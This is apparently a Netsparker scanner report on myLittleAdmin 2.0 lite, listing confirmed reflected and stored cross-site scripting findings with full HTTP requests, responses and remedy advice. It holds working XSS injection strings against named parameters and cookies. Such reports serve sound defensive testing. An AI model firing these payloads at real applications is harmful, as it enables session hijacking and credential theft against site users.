/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1
mla_conn_networklibrary POST '"--></style></script><script>alert(0x000460)</script>

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000460%29%3C%2Fscript%3E&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=IKHDKDPDABPMECOBFKBBJAGC
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:48:48 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:48:48 GMT
Content-Length: 1622


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=3;Address=3,3;Network ='"--></style></script><script>netsparker(0x000460)</script>;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1
mla_conn_portnumber POST '"--></style></script><script>alert(0x00046A)</script>

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00046A%29%3C%2Fscript%3E; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=IKHDKDPDABPMECOBFKBBJAGC
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:48:51 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:48:51 GMT
Content-Length: 1620


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=3;Address=3,'"--></style></script><script>netsparker(0x00046A)</script>;Network =3;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
- /mla2000/scripts/pref/default.asp

/mla2000/scripts/pref/default.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/default.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1
mla_cfg_theme POST '"--></style></script><script>alert(0x0005B3)</script>

Request

GET /mla2000/scripts/pref/default.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/theme.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=MaxDisplayedChar=40&MaxDisplayedBin=16&ShowSysProcedure=False&ShowSysFunction=False&PageSize=20&ShowSysTable=False&RowDelimiter=%3B&FirstDayOfWeek=1&Theme=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0005B3%29%3C%2Fscript%3E&Lng=&ShowSysDatabase=False&ShowSysView=False; ConnStr=User=%27%3E%3Cnet+sparker%3Dnetsparker%280x0004DE%29%3E&Networklibrary=3&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=PKHDKDPDFHAAPLEPIAECFPPO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:50:40 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:50:39 GMT
Content-Length: 1140


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/'"--></style></script><script>netsparker(0x0005B3)</script>/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../pref/default.asp">Preferences</A></P>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=4>Preferences</TD></TR>
<TR><TD>
Choose between<BR>
<UL>
<LI><A CLASS="contentLink" HREF="theme.asp">Skin</A></LI><LI><A CLASS="contentLink" HREF="language.asp">Language</A></LI><LI><A CLASS="contentLink" HREF="display.asp">Display</A></LI>
</UL>
</TD></TR>
</TABLE>



<P>&nbsp;</P>
<H2>Please wait while the tree is loading...</H2>


<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--

if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";

//-->
</SCRIPT>

</BODY>
</HTML>
- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1
mla_conn_initialcatalog POST "><net sparker=alert(0x0003EE)>

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=%22%3E%3Cnet+sparker%3Dnetsparker%280x0003EE%29%3E; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GGHDKDPDJGDBNDNCELJMJFEF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:11 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:10 GMT
Content-Length: 1612


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=3;Address=3,3;Network =3;Database="><net sparker=netsparker(0x0003EE)>;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
Permanent Cross-site Scripting

Permanent Cross-site Scripting

2 TOTAL
IMPORTANT
CONFIRMED
2

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Injection URL

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Injection Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000410%29%3C%2Fscript%3E; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

Identification Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:55 GMT
Content-Length: 1570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn='"--></style></script><script>netsparker(0x000410)</script>;uid=3;pwd=3
</TD></TR>
</TABLE>
&nbsp;<BR>

